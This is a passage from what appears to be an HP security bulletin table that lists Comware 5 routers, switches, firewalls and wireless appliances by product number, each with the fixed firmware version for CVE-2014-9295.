Router Chassis, JG353A HP HSR6602-G Router, JG354A HP\nHSR6602-XG Router, JG355A HP 6600 MCP-X1 Router Main Processing Unit, JG356A\nHP 6600 MCP-X2 Router Main Processing Unit, JG776A HP HSR6602-G TAA-compliant\nRouter, JG777A HP HSR6602-XG TAA-compliant Router, JG778A HP 6600 MCP-X2\nRouter TAA-compliant Main Processing Unit\n\n CVE-2014-9295\n\nHSR6800 (Comware 5)\n R3303P18\n JG361A HP HSR6802 Router Chassis, JG362A HP HSR6804 Router Chassis, JG363A\nHP HSR6808 Router Chassis, JG364A HP HSR6800 RSE-X2 Router Main Processing\nUnit, JG779A HP HSR6800 RSE-X2 Router TAA-compliant Main Processing Unit\n\n CVE-2014-9295\n\nMSR20 (Comware 5)\n R2513P45\n JD432A HP A-MSR20-21 Router, JD662A HP MSR20-20 Router, JD663A HP A-MSR20-21\nRouter, JD663B HP MSR20-21 Router, JD664A HP MSR20-40 Router, JF228A HP\nMSR20-40 Router, JF283A HP MSR20-20 Router\n\n CVE-2014-9295\n\nMSR20-1X (Comware 5)\n R2513P45\n JD431A HP MSR20-10 Router, JD667A HP MSR20-15 IW Multi-Service Router,\nJD668A HP MSR20-13 Multi-Service Router, JD669A HP MSR20-13 W Multi-Service\nRouter, JD670A HP MSR20-15 A Multi-Service Router, JD671A HP MSR20-15 AW\nMulti-Service Router, JD672A HP MSR20-15 I Multi-Service Router, JD673A HP\nMSR20-11 Multi-Service Router, JD674A HP MSR20-12 Multi-Service Router,\nJD675A HP MSR20-12 W Multi-Service Router, JD676A HP MSR20-12 T1\nMulti-Service Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A\nRouter, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP\nMSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router,\nJF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP\nMSR20-15-A-W Router, JF817A HP MSR20-15 Router, JG209A HP MSR20-12-T-W Router\n(NA), JG210A HP MSR20-13-W Router (NA)\n H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1, H3C RT-MSR2015-AC-OVS-AW-H3\n(0235A393), H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C\nRT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-11 (0235A31V), H3C MSR 20-12\n(0235A32E), H3C MSR 20-12 T1 (0235A32B), H3C MSR 20-13 (0235A31W), H3C MSR\n20-13 W (0235A31X), H3C MSR 20-15 A (0235A31Q), H3C MSR 20-15 A W (0235A31R),\nH3C MSR 20-15 I (0235A31N), H3C MSR 20-15 IW (0235A31P), H3C MSR20-12 W\n(0235A32G)\n CVE-2014-9295\n\nMSR 30 (Comware 5)\n R2513P45\n JD654A HP MSR30-60 POE Multi-Service Router, JD657A HP MSR30-40\nMulti-Service Router, JD658A HP MSR30-60 Multi-Service Router, JD660A HP\nMSR30-20 POE Multi-Service Router, JD661A HP MSR30-40 POE Multi-Service\nRouter, JD666A HP MSR30-20 Multi-Service Router, JF229A HP MSR30-40 Router,\nJF230A HP MSR30-60 Router, JF232A HP RTMSR3040-AC-OVSAS-H3, JF235A HP\nMSR30-20 DC Router, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router,\nJF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A HP\nMSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router\n H3C MSR 30-20 Router (0235A328), H3C MSR 30-40 Router Host(DC) (0235A268),\nH3C RT-MSR3020-AC-POE-OVS-H3 (0235A322), H3C RT-MSR3020-DC-OVS-H3 (0235A267),\nH3C RT-MSR3040-AC-OVS-H (0235A299), H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323),\nH3C RT-MSR3060-AC-OVS-H3 (0235A320), H3C RT-MSR3060-AC-POE-OVS-H3 (0235A296),\nH3C RT-MSR3060-DC-OVS-H3 (0235A269), H3C MSR 30-20 RTVZ33020AS Router\nHost(AC) (0235A20S), H3C MSR 30-20 (0235A19L), H3C MSR 30-20 POE (0235A239),\nH3C MSR 30-40 (0235A20J), H3C MSR 30-40 POE (0235A25R), H3C MSR 30-60\n(0235A20K), H3C MSR 30-60 POE (0235A25S), H3C RT-MSR3040-AC-OVS-AS-H3\n(0235A20V)\n CVE-2014-9295\n\nMSR 30-16 (Comware 5)\n R2513P45\n JD659A HP MSR30-16 POE Multi-Service Router, JD665A HP MSR30-16\nMulti-Service Router, JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE\nRouter,\n H3C RT-MSR3016-AC-OVS-H3 (0235A327), H3C RT-MSR3016-AC-POE-OVS-H3\n(0235A321), H3C MSR 30-16 (0235A237), H3C MSR 30-16 POE (0235A238)\n CVE-2014-9295\n\nMSR 30-1X (Comware 5)\n R2513P45\n JF800A HP MSR30-11 Router, JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr,\nJG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC\nRouter\n 2FE 2SIC 1XMIM 256DDR (0235A39H), H3C RT-MSR3011-AC-OVS-H3 (0235A29L)\n CVE-2014-9295\n\nMSR 50 (Comware 5)\n R2513P45\n JD433A HP MSR50-40 Router, JD653A HP MSR50 Processor Module, JD655A HP\nMSR50-40 Multi-Service Router, JD656A HP MSR50-60 Multi-Service Router,\nJF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60\nRtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297), H3C MSR5040-DCOVS-H3C (0235A20P), H3C\nRT-MSR5060-AC-OVS-H3 (0235A298), H3C MSR 50-40 Chassis (0235A20N), H3C MSR\n50-60 Chassis (0235A20L)\n CVE-2014-9295\n\nMSR 50-G2 (Comware 5)\n R2513P45\n JD429A HP MSR50 G2 Processor Module, JD429B HP MSR50 G2 Processor Module\n H3C H3C MSR 50 Processor Module-G2 (0231A84Q), H3C MSR 50 High Performance\nMain Processing Unit 3GE (Combo) 256F/1GD (0231A0KL)\n CVE-2014-9295\n\nMSR 9XX (Comware 5)\n R2513P45\n JF812A HP MSR900 Router, JF813A HP MSR920 Router, JF814A HP MSR900-W Router,\nJF815A HP MSR920 2FEWAN/8FELAN/.11 b/g Rtr, JG207A HP MSR900-W Router (NA),\nJG208A HP MSR920-W Router (NA)\n H3C MSR 900 Router with 802.11b/g 2 FE WAN 4 FE LAN 256DDR 802.11b\n(0235A0C2), H3C MSR 900 Router 2 FE WAN 4 FE LAN 256DDR (0235A0BX), H3C MSR\n920 Router with 802.11b/g 2 FE WAN 8 FE LAN 256DDR (0235A0C4), H3C MSR 920\nRouter 2 FE WAN 8 FE LAN 256DDR (0235A0C0)\n CVE-2014-9295\n\nMSR 93X (Comware 5)\n R2513P45\n JG512A HP MSR930 Wireless Router, JG513A HP MSR930 3G Router, JG514A HP\nMSR931 Router, JG515A HP MSR931 3G Router, JG516A HP MSR933 Router, JG517A HP\nMSR933 3G Router, JG518A HP MSR935 Router, JG519A HP MSR935 Wireless Router,\nJG520A HP MSR935 3G Router, JG531A HP MSR931 Dual 3G Router, JG596A HP MSR930\n4G LTE/3G CDMA Router, JG597A HP MSR936 Wireless Router, JG665A HP MSR930 4G\nLTE/3G WCDMA Global Router, JG704A HP MSR930 4G LTE/3G WCDMA ATT Router\n N/A\n CVE-2014-9295\n\nMSR1000 (Comware 5)\n R2513P45\n JG732A HP MSR1003-8 AC Router\n N/A\n CVE-2014-9295\n\nMSR20 (Comware 5 - Low Encryption SW)\n R2513L61\n JD663B HP MSR20-21 Router, JF228A HP MSR20-40 Router, JF283A HP MSR20-20\nRouter\n H3C RT-MSR2020-AC-OVS-H3C (0235A324), H3C RT-MSR2040-AC-OVS-H3 (0235A326)\n CVE-2014-9295\n\nMSR20-1X (Comware 5 - Low Encryption SW)\n R2513L61\n JD431A HP MSR20-10 Router, JF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A\nRouter, JF238A HP MSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP\nMSR20-13 Router, JF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router,\nJF807A HP MSR20-12-W Router, JF808A HP MSR20-13-W Router, JF809A HP\nMSR20-15-A-W Router, JF817A HP MSR20-15 Router\n H3C MSR 20-10 (0235A0A7), H3C RT-MSR2015-AC-OVS-I-H3 (0235A394), H3C\nRT-MSR2015-AC-OVS-A-H3 (0235A392), H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393),\nH3C RT-MSR2011-AC-OVS-H3 (0235A395), H3C RT-MSR2013-AC-OVS-H3 (0235A390), H3C\nRT-MSR2012-AC-OVS-H3 (0235A396), H3C RT-MSR2012-TAC-OVS-H3 (0235A398), H3C\nRT-MSR2012-AC-OVS-W-H3 (0235A397), H3C RT-MSR2013-AC-OVS-W-H3 (0235A391), H3C\nRT-MSR2015-AC-OVS-IW-H3 (0235A38V), H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW\n1 ADSLoPOTS 1 DSIC (0235A0A8)\n CVE-2014-9295\n\nMSR30 (Comware 5 - Low Encryption SW)\n R2513L61\n JF229A HP MSR30-40 Router, JF230A HP MSR30-60 Router, JF235A HP MSR30-20 DC\nRouter, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC Router, JF801A HP\nMSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A HP MSR30-40 PoE\nRouter, JF804A HP MSR30-60 PoE Router\n H3C RT-MSR3040-AC-OVS-H (0235A299), H3C RT-MSR3060-AC-OVS-H3 (0235A320), H3C\nRT-MSR3020-DC-OVS-H3 (0235A267), H3C MSR 30-20 Router (0235A328), H3C MSR\n30-40 Router Host(DC) (0235A268), H3C RT-MSR3060-DC-OVS-H3 (0235A269), H3C\nRT-MSR3020-AC-POE-OVS-H3 (0235A322), H3C RT-MSR3040-AC-POE-OVS-H3 (0235A323),\nH3C RT-MSR3060-AC-POE-OVS-H3 (0235A296)\n CVE-2014-9295\n\nMSR30-16 (Comware 5 - Low Encryption SW)\n R2513L61\n JF233A HP MSR30-16 Router, JF234A HP MSR30-16 PoE Router\n H3C RT-MSR3016-AC-OVS-H3 (0235A327), H3C RT-MSR3016-AC-POE-OVS-H3 (0235A321)\n CVE-2014-9295\n\nMSR30-1X (Comware 5 - Low Encryption SW)\n R2513L61\n JF800A HP MSR30-11 Router, JF816A HP MSR30-10 2 FE /2 SIC /1 MIM MS Rtr,\nJG182A HP MSR30-11E Router, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC\nRouter\n H3C RT-MSR3011-AC-OVS-H3 (0235A29L), H3C MSR 30-10 Router Host(AC) 2FE 2SIC\n1XMIM 256DDR (0235A39H)\n CVE-2014-9295\n\nMSR50 (Comware 5 - Low Encryption SW)\n R2513L61\n JD433A HP MSR50-40 Router, JD653A HP MSR50Processor Module, JD655A HP\nMSR50-40 Multi-Service Router, JD656A HP MSR50-60 Multi-Service Router,\nJF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP MSR50-60\nRtr Chassis w DC PwrSupply\n H3C MSR 50-40 Router (0235A297), H3C MSR 50 Processor Module (0231A791), H3C\nMSR 50-40 Chassis (0235A20N), H3C MSR 50-60 Chassis (0235A20L), H3C\nRT-MSR5060-AC-OVS-H3 (0235A298), H3C MSR5040-DCOVS-H3C (0235A20P)\n CVE-2014-9295\n\nMSR50 G2 (Comware 5 - Low Encryption SW)\n R2513L61\n JD429B HP MSR50 G2 Processor Module\n H3C MSR 50 High Performance Main Processing Unit 3GE (Combo) 256F/1GD\n(0231A0KL)\n CVE-2014-9295\n\n12500 (Comware 5)\n R1828P06\n JC085A HP A12518 Switch Chassis, JC086A HP A12508 Switch Chassis, JC652A HP\n12508 DC Switch Chassis, JC653A HP 12518 DC Switch Chassis, JC654A HP 12504\nAC Switch Chassis, JC655A HP 12504 DC Switch Chassis, JF430A HP A12518 Switch\nChassis, JF430B HP 12518 Switch Chassis, JF430C HP 12518 AC Switch Chassis,\nJF431A HP A12508 Switch Chassis, JF431B HP 12508 Switch Chassis, JF431C HP\n12508 AC Switch Chassis, JC072B HP 12500 Main Processing Unit, JC808A HP\n12500 TAA Main Processing Unit\n H3C S12508 Routing Switch (AC-1) (0235A0GE), H3C S12518 Routing Switch\n(AC-1) (0235A0GF), H3C S12508 Chassis (0235A0E6), H3C S12508 Chassis\n(0235A38N), H3C S12518 Chassis (0235A0E7), H3C S12518 Chassis (0235A38M), H3C\n12508 DC Switch Chassis (0235A38L), H3C 12518 DC Switch Chassis (0235A38K)\n CVE-2014-9295\n\n9500E (Comware 5)\n R1828P06\n JC124A HP A9508 Switch Chassis, JC124B HP 9505 Switch Chassis, JC125A HP\nA9512 Switch Chassis, JC125B HP 9512 Switch Chassis, JC474A HP A9508-V Switch\nChassis, JC474B HP 9508-V Switch Chassis\n H3C S9505E Routing-Switch Chassis (0235A0G6), H3C S9512E Routing-Switch\nChassis (0235A0G7), H3C S9508E-V Routing-Switch Chassis (0235A38Q), H3C\nS9505E Chassis w/ Fans (0235A38P), H3C S9512E Chassis w/ Fans (0235A38R)\n CVE-2014-9295\n\n10500 (Comware 5)\n R1208P10\n JC611A HP 10508-V Switch Chassis, JC612A HP 10508 Switch Chassis, JC613A HP\n10504 Switch Chassis, JC614A HP 10500 Main Processing Unit, JC748A HP 10512\nSwitch Chassis, JG375A HP 10500 TAA-compliant Main Processing Unit, JG820A HP\n10504 TAA-compliant Switch Chassis, JG821A HP 10508 TAA-compliant Switch\nChassis, JG822A HP 10508-V TAA-compliant Switch Chassis, JG823A HP 10512\nTAA-compliant Switch Chassis\n\n CVE-2014-9295\n\n7500 (Comware 5)\n R6708P10\n JC666A HP 7503-S 144Gbps Fabric/MPU with PoE Upgradable 20-port Gig-T/4-port\nGbE Combo, JC697A HP 7502 TAA-compliant Main Processing Unit, JC698A HP\n7503-S 144Gbps TAA Fabric / MPU with 16 GbE SFP Ports and 8 GbE Combo Ports,\nJC699A HP 7500 384Gbps TAA-compliant Fabric / MPU with 2 10GbE XFP Ports,\nJC700A HP 7500 384Gbps TAA-compliant Fabric / Main Processing Unit, JC701A HP\n7500 768Gbps TAA-compliant Fabric / Main Processing Unit, JD193A HP 7500\n384Gbps Fabric Module with 2 XFP Ports, JD193B HP 7500 384Gbps Fabric Module\nwith 2 XFP Ports, JD194A HP 7500 384Gbps Fabric Module, JD194B HP 7500\n384Gbps Fabric Module, JD195A HP 7500 384Gbps Advanced Fabric Module, JD196A\nHP 7502 Fabric Module, JD220A HP 7500 768Gbps Fabric Module, JD224A HP 7500\n384Gbps Fabric Module with 12 SFP Ports, JD238A HP 7510 Switch Chassis,\nJD238B HP 7510 Switch Chassis, JD239A HP 7506 Switch Chassis, JD239B HP 7506\nSwitch Chassis, JD240A HP 7503 Switch Chassis, JD240B HP 7503 Switch Chassis,\nJD241A HP 7506-V Switch Chassis, JD241B HP 7506-V Switch Chassis, JD242A HP\n7502 Switch Chassis, JD242B HP 7502 Switch Chassis, JD243A HP 7503-S Switch\nChassis with 1 Fabric Slot, JD243B HP 7503-S Switch Chassis with 1 Fabric\nSlot, JE164A HP E7902 Switch Chassis, JE165A HP E7903 Switch Chassis, JE166A\nHP E7903 1 Fabric Slot Switch Chassis, JE167A HP E7906 Switch Chassis, JE168A\nHP E7906 Vertical Switch Chassis, JE169A HP E7910 Switch Chassis\n\n CVE-2014-9295\n\n5830 (Comware 5)\n R1118P11\n JC691A HP 5830AF-48G Switch with 1 Interface Slot, JC694A HP 5830AF-96G\nSwitch, JG316A HP 5830AF-48G TAA-compliant Switch w/1 Interface Slot, JG374A\nHP 5830AF-96G TAA-compliant Switch\n\n CVE-2014-9295\n\n5800 (Comware 5)\n R1809P03\n JC099A HP 5800-24G-PoE Switch, JC099B HP 5800-24G-PoE+ Switch, JC100A HP\n5800-24G Switch, JC100B HP 5800-24G Switch, JC101A HP 5800-48G Switch with 2\nSlots, JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots, JC103A HP\n5800-24G-SFP Switch, JC103B HP 5800-24G-SFP Switch with 1 Interface Slot,\nJC104A HP 5800-48G-PoE Switch, JC104B HP 5800-48G-PoE+ Switch with 1\nInterface Slot, JC105A HP 5800-48G Switch, JC105B HP 5800-48G Switch with 1\nInterface Slot, JG254A HP 5800-24G-PoE+ TAA-compliant Switch, JG254B HP\n5800-24G-PoE+ TAA-compliant Switch, JG255A HP 5800-24G TAA-compliant Switch,\nJG255B HP 5800-24G TAA-compliant Switch, JG256A HP 5800-24G-SFP TAA-compliant\nSwitch with 1 Interface Slot, JG256B HP 5800-24G-SFP TAA-compliant Switch\nwith 1 Interface Slot, JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1\nInterface Slot, JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface\nSlot, JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG258B\nHP 5800-48G TAA-compliant Switch with 1 Interface Slot, JG225A HP 5800AF-48G\nSwitch, JG225B HP 5800AF-48G Switch, JG242A HP 5800-48G-PoE+ TAA-compliant\nSwitch with 2 Interface Slots, JG242B HP 5800-48G-PoE+ TAA-compliant Switch\nwith 2 Interface\n\n CVE-2014-9295\n\n5820 (Comware 5)\n R1809P03\n JG243A HP 5820-24XG-SFP+ TAA-compliant Switch, JG243B HP 5820-24XG-SFP+\nTAA-compliant Switch, JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2\nInterface Slots \u0026 1 OAA Slot, JG259B HP 5820-14XG-SFP+ TAA-compliant Switch\nwith 2 Interface Slots and 1 OAA Slot, JC106A HP 5820-14XG-SFP+ Switch with 2\nSlots, JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots \u0026 1 OAA Slot,\nJG219A HP 5820AF-24XG Switch, JG219B HP 5820AF-24XG Switch, JC102A HP\n5820-24XG-SFP+ Switch, JC102B HP 5820-24XG-SFP+ Switch\n\n CVE-2014-9295\n\n5500 HI (Comware 5)\n R5501P06\n JG311A HP 5500-24G-4SFP HI Switch with 2 Interface Slots, JG312A HP\n5500-48G-4SFP HI Switch with 2 Interface Slots, JG541A HP 5500-24G-PoE+-4SFP\nHI Switch with 2 Interface Slots, JG542A HP 5500-48G-PoE+-4SFP HI Switch with\n2 Interface Slots, JG543A HP 5500-24G-SFP HI Switch with 2 Interface Slots,\nJG679A HP 5500-24G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots,\nJG680A HP 5500-48G-PoE+-4SFP HI TAA-compliant Switch with 2 Interface Slots,\nJG681A HP 5500-24G-SFP HI TAA-compliant Switch with 2 Interface Slots\n\n CVE-2014-9295\n\n5500 EI (Comware 5)\n R2221P08\n JD373A HP 5500-24G DC EI Switch, JD374A HP 5500-24G-SFP EI Switch, JD375A HP\n5500-48G EI Switch, JD376A HP 5500-48G-PoE EI Switch, JD377A HP 5500-24G EI\nSwitch, JD378A HP 5500-24G-PoE EI Switch, JD379A HP 5500-24G-SFP DC EI\nSwitch, JG240A HP 5500-48G-PoE+ EI Switch with 2 Interface Slots, JG241A HP\n5500-24G-PoE+ EI Switch with 2 Interface Slots, JG249A HP 5500-24G-SFP EI\nTAA-compliant Switch with 2 Interface, JG250A HP 5500-24G EI TAA-compliant\nSwitch with 2 Interface Slots, JG251A HP 5500-48G EI TAA-compliant Switch\nwith 2 Interface Slots, JG252A HP 5500-24G-PoE+ EI TAA-compliant Switch with\n2 Interface Slots, JG253A HP 5500-48G-PoE+ EI TAA-compliant Switch with 2\nInterface Slots\n\n CVE-2014-9295\n\n4800G (Comware 5)\n R2221P08\n JD007A HP 4800-24G Switch, JD008A HP 4800-24G-PoE Switch, JD009A HP\n4800-24G-SFP Switch, JD010A HP 4800-48G Switch, JD011A HP 4800-48G-PoE Switch\n\n CVE-2014-9295\n\n5500SI (Comware 5)\n R2221P08\n JD369A HP 5500-24G SI Switch, JD370A HP 5500-48G SI Switch, JD371A HP\n5500-24G-PoE SI Switch, JD372A HP 5500-48G-PoE SI Switch, JG238A HP\n5500-24G-PoE+ SI Switch with 2 Interface Slots, JG239A HP 5500-48G-PoE+ SI\nSwitch with 2 Interface Slots\n\n CVE-2014-9295\n\n4500G (Comware 5)\n R2221P08\n JF428A HP 4510-48G Switch, JF847A HP 4510-24G Switch\n\n CVE-2014-9295\n\n5120 EI (Comware 5)\n R2221P08\n JE066A HP 5120-24G EI Switch, JE067A HP 5120-48G EI Switch, JE068A HP\n5120-24G EI Switch with 2 Interface Slots, JE069A HP 5120-48G EI Switch with\n2 Interface Slots, JE070A HP 5120-24G-PoE EI 2-slot Switch, JE071A HP\n5120-48G-PoE EI 2-slot Switch, JG236A HP 5120-24G-PoE+ EI Switch with 2\nInterface Slots, JG237A HP 5120-48G-PoE+ EI Switch with 2 Interface Slots,\nJG245A HP 5120-24G EI TAA-compliant Switch with 2 Interface Slots, JG246A HP\n5120-48G EI TAA-compliant Switch with 2 Interface Slots, JG247A HP\n5120-24G-PoE+ EI TAA-compliant Switch with 2 Slots, JG248A HP 5120-48G-PoE+\nEI TAA-compliant Switch with 2 Slots\n\n CVE-2014-9295\n\n4210G (Comware 5)\n R2221P08\n JF844A HP 4210-24G Switch, JF845A HP 4210-48G Switch, JF846A HP 4210-24G-PoE\nSwitch\n\n CVE-2014-9295\n\n5120 SI (Comware 5)\n R1513P95\n JE072A HP 5120-48G SI Switch, JE073A HP 5120-16G SI Switch, JE074A HP\n5120-24G SI Switch, JG091A HP 5120-24G-PoE+ (370W) SI Switch, JG092A HP\n5120-24G-PoE+ (170W) SI Switch\n\n CVE-2014-9295\n\n3610 (Comware 5)\n R5319P10\n JD335A HP 3610-48 Switch, JD336A HP 3610-24-4G-SFP Switch, JD337A HP\n3610-24-2G-2G-SFP Switch, JD338A HP 3610-24-SFP Switch\n\n CVE-2014-9295\n\n3600V2 (Comware 5)\n R2110P03\n JG299A HP 3600-24 v2 EI Switch, JG299B HP 3600-24 v2 EI Switch, JG300A HP\n3600-48 v2 EI Switch, JG300B HP 3600-48 v2 EI Switch, JG301A HP 3600-24-PoE+\nv2 EI Switch, JG301B HP 3600-24-PoE+ v2 EI Switch, JG301C HP 3600-24-PoE+ v2\nEI Switch, JG302A HP 3600-48-PoE+ v2 EI Switch, JG302B HP 3600-48-PoE+ v2 EI\nSwitch, JG302C HP 3600-48-PoE+ v2 EI Switch, JG303A HP 3600-24-SFP v2 EI\nSwitch, JG303B HP 3600-24-SFP v2 EI Switch, JG304A HP 3600-24 v2 SI Switch,\nJG304B HP 3600-24 v2 SI Switch, JG305A HP 3600-48 v2 SI Switch, JG305B HP\n3600-48 v2 SI Switch, JG306A HP 3600-24-PoE+ v2 SI Switch, JG306B HP\n3600-24-PoE+ v2 SI Switch, JG306C HP 3600-24-PoE+ v2 SI Switch, JG307A HP\n3600-48-PoE+ v2 SI Switch, JG307B HP 3600-48-PoE+ v2 SI Switch, JG307C HP\n3600-48-PoE+ v2 SI Switch\n\n CVE-2014-9295\n\n3100V2-48 (Comware 5)\n R2110P03\n JG315A HP 3100-48 v2 Switch, JG315B HP 3100-48 v2 Switch\n\n CVE-2014-9295\n\n3100V2 (Comware 5)\n R5203P11\n JD313B HP 3100-24-PoE v2 EI Switch, JD318B HP 3100-8 v2 EI Switch, JD319B HP\n3100-16 v2 EI Switch, JD320B HP 3100-24 v2 EI Switch, JG221A HP 3100-8 v2 SI\nSwitch, JG222A HP 3100-16 v2 SI Switch, JG223A HP 3100-24 v2 SI Switch\n\n CVE-2014-9295\n\nHP870 (Comware 5)\n R2607P35\n JG723A HP 870 Unified Wired-WLAN Appliance, JG725A HP 870 Unified Wired-WLAN\nTAA-compliant Appliance\n\n CVE-2014-9295\n\nHP850 (Comware 5)\n R2607P35\n JG722A HP 850 Unified Wired-WLAN Appliance, JG724A HP 850 Unified Wired-WLAN\nTAA-compliant Appliance\n\n CVE-2014-9295\n\nHP830 (Comware 5)\n R3507P35\n JG640A HP 830 24-Port PoE+ Unified Wired-WLAN Switch, JG641A HP 830 8-port\nPoE+ Unified Wired-WLAN Switch, JG646A HP 830 24-Port PoE+ Unified Wired-WLAN\nTAA-compliant Switch, JG647A HP 830 8-Port PoE+ Unified Wired-WLAN\nTAA-compliant\n\n CVE-2014-9295\n\nHP6000 (Comware 5)\n R2507P35\n JG639A HP 10500/7500 20G Unified Wired-WLAN Module, JG645A HP 10500/7500 20G\nUnified Wired-WLAN TAA-compliant Module\n\n CVE-2014-9295\n\nWX5004-EI (Comware 5)\n R2507P35\n JD447B HP WX5002 Access Controller, JD448A HP WX5004 Access Controller,\nJD448B HP WX5004 Access Controller, JD469A HP WX5004 Access Controller\n\n CVE-2014-9295\n\nSecBlade FW (Comware 5)\n R3181P05\n JC635A HP 12500 VPN Firewall Module, JD245A HP 9500 VPN Firewall Module,\nJD249A HP 10500/7500 Advanced VPN Firewall Module, JD250A HP 6600 Firewall\nProcessing Router Module, JD251A HP 8800 Firewall Processing Module, JD255A\nHP 5820 VPN Firewall Module\n\n CVE-2014-9295\n\nF1000-E (Comware 5)\n R3181P05\n JD272A HP F1000-E VPN Firewall Appliance\n\n CVE-2014-9295\n\nF1000-A-EI (Comware 5)\n R3734P06\n JG214A HP F1000-A-EI VPN Firewall Appliance\n\n CVE-2014-9295\n\nF1000-S-EI (Comware 5)\n R3734P06\n JG213A HP F1000-S-EI VPN Firewall Appliance\n\n CVE-2014-9295\n\nF5000-A (Comware 5)\n F3210P23\n JD259A HP A5000-A5 VPN Firewall Chassis, JG215A HP F5000 Firewall Main\nProcessing Unit, JG216A HP F5000 Firewall Standalone Chassis\n\n CVE-2014-9295\n\nU200S and CS (Comware 5)\n F5123P31\n JD273A HP U200-S UTM Appliance\n\n CVE-2014-9295\n\nU200A and M (Comware 5)\n F5123P31\n JD275A HP U200-A UTM Appliance\n\n CVE-2014-9295\n\nF5000-C/S (Comware 5)\n R3811P03\n JG650A HP F5000-C VPN Firewall Appliance, JG370A HP F5000-S VPN Firewall\nAppliance\n\n CVE-2014-9295\n\nSecBlade III (Comware 5)\n R3820P03\n JG371A HP 12500 20Gbps VPN Firewall Module, JG372A HP 10500/11900/7500\n20Gbps VPN Firewall Module\n\n CVE-2014-9295\n\nMSR20 RU (Comware 5 Low Encryption SW)\n R2513L61\n JD432A HP A-MSR20-21 Router, JD662A HP MSR20-20 Router, JD663A HP A-MSR20-21\nRouter, JD663B HP MSR20-21 Router, JD664A HP MSR20-40 Router, JF228A HP\nMSR20-40, JF283A HP MSR20-20 Router\n\n CVE-2014-9295\n\nMSR20-1X RU (Comware 5 Low Encryption SW)\n R2513L61\n JD431A HP MSR20-10 Router, JD667A HP A-MSR20-15 IW Multi-service Router,\nJD668A HP MSR20-13 Router, JD669A HP MSR20-13-W Router, JD670A HP A-MSR20-15\nA Multi-service Router, JD671A HP A-MSR20-15 AW Multi-service Router, JD672A\nHP A-MSR20-15 I Multi-service Router, JD673A HP MSR20-11 Router, JD674A HP\nMSR20-12 Router, JD675A HP MSR20-12-W Router, JD676A HP MSR20-12-T Router,\nJF236A HP MSR20-15-I Router, JF237A HP MSR20-15-A Router, JF238A HP\nMSR20-15-I-W Router, JF239A HP MSR20-11 Router, JF240A HP MSR20-13 Router,\nJF241A HP MSR20-12 Router, JF806A HP MSR20-12-T Router, JF807A HP MSR20-12-W\nRouter, JF808A HP MSR20-13-W Router, JF809A HP MSR20-15-A-W Router, JF817A HP\nMSR20-15 Router, JG209A HP MSR20-12-T-W Router, JG210A HP MSR20-13-W Router\n\n CVE-2014-9295\n\nMSR30 RU (Comware 5 Low Encryption SW)\n R2513L61\n JD654A HP MSR30-60 PoE Router, JD657A HP MSR30-40 Router, JD658A HP MSR30-60\nRouter, JD660A HP MSR30-20 PoE Router, JD661A HP MSR30-40 PoE Router, JD666A\nHP MSR30-20 Router, JF229A HP MSR30-40 Router, JF230A HP MSR30-60 Router,\nJF232A HP A-MSR30-40 (RT-MSR3040-AC-OVS-AS-H3) Multi-service Router, JF235A\nHP MSR30-20 DC Router, JF284A HP MSR30-20 Router, JF287A HP MSR30-40 DC\nRouter, JF801A HP MSR30-60 DC Router, JF802A HP MSR30-20 PoE Router, JF803A\nHP MSR30-40 PoE Router, JF804A HP MSR30-60 PoE Router, JG728A HP MSR30-20\nTAA-compliant DC Router, JG729A HP MSR30-20 TAA-compliant Router\n\n CVE-2014-9295\n\nMSR301X RU (Comware 5 Low Encryption SW)\n R2513L61\n JF800A HP MSR30-11 Router, JF816A HP MSR30-10 Router, JG182A HP MSR30-11E\nRouter, JG183A HP MSR30-11F Router, JG184A HP MSR30-10 DC Router\n\n CVE-2014-9295\n\nMSR316 RU (Comware 5 Low Encryption SW)\n R2513L61\n JD659A HP MSR30-16 PoE Router, JD665A HP MSR30-16 Router, JF233A HP MSR30-16\nRouter, JF234A HP MSR30-16 PoE Router\n\n CVE-2014-9295\n\nMSR50 RU (Comware 5 Low Encryption SW)\n R2513L61\n JD433A HP MSR50-40 Router, JD653A HP MSR50 Processor Module, JD655A HP MSR\n50-40 Router, JD656A HP MSR50-60 Router, JF231A HP MSR50-60 Router, JF285A HP\nMSR50-40 DC Router, JF640A HP MSR50-60 Router Chassis with DC Power Supply\n\n CVE-2014-9295\n\nMSR50 EPU RU (Comware 5 Low Encryption SW)\n R2513L61\n JD429A HP MSR50 G2 Processor Module, JD429B HP MSR50 G2 Processor Module,\nJD433A HP MSR50-40 Router, JD655A HP MSR 50-40 Router, JD656A HP MSR50-60\nRouter, JF231A HP MSR50-60 Router, JF285A HP MSR50-40 DC Router, JF640A HP\nMSR50-60 Router Chassis with DC Power Supply\n\n CVE-2014-9295\n\nMSR1000 RU 